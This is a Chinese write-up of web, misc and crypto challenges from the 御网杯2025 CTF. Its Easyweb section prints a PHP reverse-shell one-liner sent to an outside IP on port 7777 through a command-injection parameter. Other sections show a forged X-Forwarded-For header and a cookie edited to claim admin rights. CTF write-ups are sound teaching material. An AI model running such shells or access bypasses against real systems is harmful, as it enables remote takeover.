御网杯2025 Web,Msic,密码 WP

Web

YWB_Web_xff

审计代码,发现需要$cip=2.2.2.1

使用burpsuite抓包,添加X-Forwarded-For:2.2.2.1

然后得到flag

YWB_Web_未授权访问

更加题目描述知道需要admin登录,但是现在是guest。

使用burpsuite抓包

发现cookie里面存在user,且是url编码的。

使用随波逐流进行url解码。

修改guest为admin,isAdmin为1

在进行url编码

最后修改burpsuite数据包里面的user。为刚刚加密出来的

获取到flag

Easyweb

代码审计发现只要输入命令exec就能够执行,但是exec函数没有回显,所以使用shell反弹

反弹命令:php -r '$sock=fsockopen("103.51.147.173",7777);exec("sh <&3 >&3 2>&3");'

Hacker传参cmd=php -r '$sock=fsockopen("103.51.147.173",7777);exec("sh <&3 >&3 2>&3");'

在进行一次url编码。同时服务器监听7777端口

可以看到监听成功

查看/flag.txt

Cat /flag.txt

YWB_Web_命令执行过滤绕过

根据提示:小明结合小华的代码又写了一个,你能分析代码找到flag吗?

右击源码发现了代码

想到了使用var_dump(file_get_contents()); 来绕过

发现了flag

YWB_Web_反序列化

题目内容:每一次反序列化都是一次艺术创作,构造出正确的对象与密码,揭开过滤后的秘密,找到埋藏的flag。

附件中给出了源码,审计发现,接收post参数msg并且帅冲filter过滤了(内容是flag,php)然后在进行判断,如果$a->pass === "myzS@11wawq"就能获取到flag

复制代码
<?php
function filter($name){
    $safe = array("flag", "php");
    return str_replace($safe, "hack", $name);
}

class mylogin {
    var $user;
    var $pass;

    function __construct($user, $pass) {
        $this->user = $user;
        $this->pass = $pass;
    }
}



$m = new mylogin('FLAG.PHP','myzS@11wawq');
echo serialize($m);

将结果输入到页面中得到flag

MISC

ez_xor

根据题目名字可以知道是xor

使用python脚本

python 复制代码
def decrypt_xor(ciphertext_hex: str, key: int) -> str:
    """
    使用XOR密钥解密十六进制格式的密文

    参数:
    ciphertext_hex (str): 以十六进制字符串表示的密文,允许使用'-'分隔
    key (int): 用于解密的XOR密钥

    返回:
    str: 解密后的明文字符串

    异常:
    ValueError: 当输入的十六进制字符串格式不正确时抛出
    UnicodeDecodeError: 当解密后的字节无法转换为UTF-8字符串时抛出
    """
    # 清理并验证十六进制输入
    clean_hex = ciphertext_hex.replace('-', '')
    if not all(c in '0123456789abcdefABCDEF' for c in clean_hex):
        raise ValueError("输入包含非十六进制字符")

    # 转换为字节并执行XOR解密
    ciphertext_bytes = bytes.fromhex(clean_hex)
    decrypted_bytes = bytes(b ^ key for b in ciphertext_bytes)

    # 尝试解码为UTF-8字符串
    try:
        return decrypted_bytes.decode('utf-8')
    except UnicodeDecodeError:
        # 如果无法解码为UTF-8,返回原始字节的十六进制表示
        print("警告: 解密结果不是有效的UTF-8字符串,返回原始字节")
        return decrypted_bytes.hex()


# 使用示例
if __name__ == "__main__":
    ciphertext_hex = '5f-55-58-5e-42-71-7a-6d-7f-48-4e-5c-78-6a-7d-08-0e-0a-44'
    key = 0x39  # 密钥为0x39(十进制57)

    try:
        decrypted_text = decrypt_xor(ciphertext_hex, key)
        print(f"解密结果: {decrypted_text}")
    except (ValueError, UnicodeDecodeError) as e:
        print(f"解密失败: {e}")

跑出来flag

光隙中的寄生密钥

使用Formosa分离图片里的秘密.jpg

存在一个压缩包有密码,使用ARCHPR爆破,密码是9864

得到5a6d78685a337379566d516a545773324a5842534f58705949584e4266513d3d

放进随波逐流解码,得到116进制转字符

被折叠的显影图纸

有一个flag.xls直接拖到随波逐流,直接得到flag

ez_picture

将15.png拖入随波逐流

看到RGB通道疑似密码,尝试输入发现可以解压缩

存在1.jpg拖入随波逐流

在继续解码

easy_misc

77 49 66 77 83 107 104 68 78 70 81 50 90 50 104 87 98 87 74 76 97 88 66 51 98 50 78 112 81 88 100 89 83 109 82 81 89 107 112 70 83 68 73 61

发现一串10进制拖入随波逐流

发现10进制转字符串是base64

继续解码

发现是base58

套娃

解压发现txt是个压缩包

修改后缀为zip

发现还存在套娃继续修改后缀为zip

然后在world/document.xml文件下找到flag

CRYPTO

cry_rsa

跑脚本

python 复制代码
def extended_gcd(a, b):
    """计算最大公约数和贝祖系数"""
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = extended_gcd(b % a, a)
        return (g, x - (b // a) * y, y)

def modinv(a, m):
    """计算a在模m下的乘法逆元"""
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError(f"逆元不存在,因为{gcd(a, m)} != 1")
    else:
        return x % m

def is_prime(n):
    """检查数字是否为素数"""
    if n <= 1:
        return False
    for i in range(2, int(n**0.5) + 1):
        if n % i == 0:
            return False
    return True

def calculate_rsa_components(p, q, e):
    """计算RSA密钥组件"""
    # 验证输入是否为素数
    if not (is_prime(p) and is_prime(q)):
        raise ValueError("p和q必须是素数")
    
    # 计算n和φ(n)
    n = p * q
    phi_n = (p - 1) * (q - 1)
    
    # 验证e是否有效
    from math import gcd
    if gcd(e, phi_n) != 1:
        raise ValueError("e和φ(n)必须互质")
    
    # 计算私钥指数d
    d = modinv(e, phi_n)
    
    return {
        'n': n,
        'phi_n': phi_n,
        'd': d,
        'flag': d + 2
    }

def main():
    try:
        # RSA参数
        p = 473398607161
        q = 4511491
        e = 19
        
        # 计算RSA组件
        components = calculate_rsa_components(p, q, e)
        
        # 输出结果
        print("==== RSA密钥计算结果 ====")
        print(f"p = {p}")
        print(f"q = {q}")
        print(f"e = {e}")
        print(f"n = p * q = {components['n']}")
        print(f"φ(n) = (p-1)*(q-1) = {components['phi_n']}")
        print(f"私钥指数 d = {components['d']}")
        print(f"\nFLAG: flag{{{components['flag']}}}")
        
    except ValueError as ve:
        print(f"输入错误: {ve}")
    except Exception as e:
        print(f"计算过程出错: {e}")

if __name__ == "__main__":
main()

从而得出flag

gift

向后移了五位p对应u,i对应n,e对应j

编写脚本跑

python 复制代码
# 计算无穷级数 1 - 1/3 + 1/5 - 1/7 +...
def calculate_series():
    sum_series = 0
    sign = 1
    denominator = 1
    num_terms = 1000  # 计算的项数,可以调整以提高精度
    for _ in range(num_terms):
        sum_series += sign / denominator
        sign = -sign
        denominator += 2
    return sum_series


# 凯撒密码加密函数,偏移量为 2
def caesar_encrypt(text):
    encrypted_text = ""
    for char in text:
        if char.isalpha():
            if char.islower():
                new_char = chr((ord(char) - ord('a') + 2) % 26 + ord('a'))
            else:
                new_char = chr((ord(char) - ord('A') + 2) % 26 + ord('A'))
        else:
            new_char = char
        encrypted_text += new_char
    return encrypted_text


# 主程序
if __name__ == "__main__":
    series_result = calculate_series()
    print(f"无穷级数的近似结果: {series_result}")
    original_text = "pie"
    encrypted_result = caesar_encrypt(original_text)
    print(f"加密后的结果: flag{{{encrypted_result}}}")

草甸方阵的密语

存在一个exe文件,拖进winhex查看

复制到随波逐流进行栅栏解码

之后将10栏在进行一次凯撒

得到flag

easy-签到题

附件中同样存在exe文件,winhex打开

拖入随波逐流一键解码。

baby_rsa

用winhex打开得到e,N,c,然后使用factor在线网站http://www.factordb.com/index.php?id=1100000008203254317分解N,得到两个素数p,q

后面正常解rsa得到flag{5c9c885c361541e0b261f58b61db8cec}

根据附件将2替换成3得到最终flag{5c9c885c361541e0b361f58b61db8cec}

ez_base

打开附件发现是垃圾信息中提取邮件使用在线网站https://www.spammimic.com/decode.cgi decode出base64

再解base64得到flag{HNCTFCEwYSLFBHU8TF}

相关推荐
Hopebearer_11 小时前
什么是CacheStorage?
前端·javascript·web
東雪木13 小时前
Web开发—Vue工程化
前端·javascript·vue.js·前端框架·web
酷小洋1 天前
JavaWeb基础
后端·web
无名之逆2 天前
Hyperlane: Unleash the Power of Rust for High-Performance Web Services
java·开发语言·前端·后端·http·rust·web
一方~2 天前
XML语言
xml·java·web
互联网搬砖老肖2 天前
Web 架构之数据读写分离
前端·架构·web
小芝麻咿呀3 天前
websocketd 10秒教程
websocket·web
忧虑的乌龟蛋6 天前
Qt实现网页内嵌
qt·web·msvc·网页·网页内嵌·qt界面·webenginewidget
越来越无动于衷12 天前
java web 过滤器
java·开发语言·servlet·web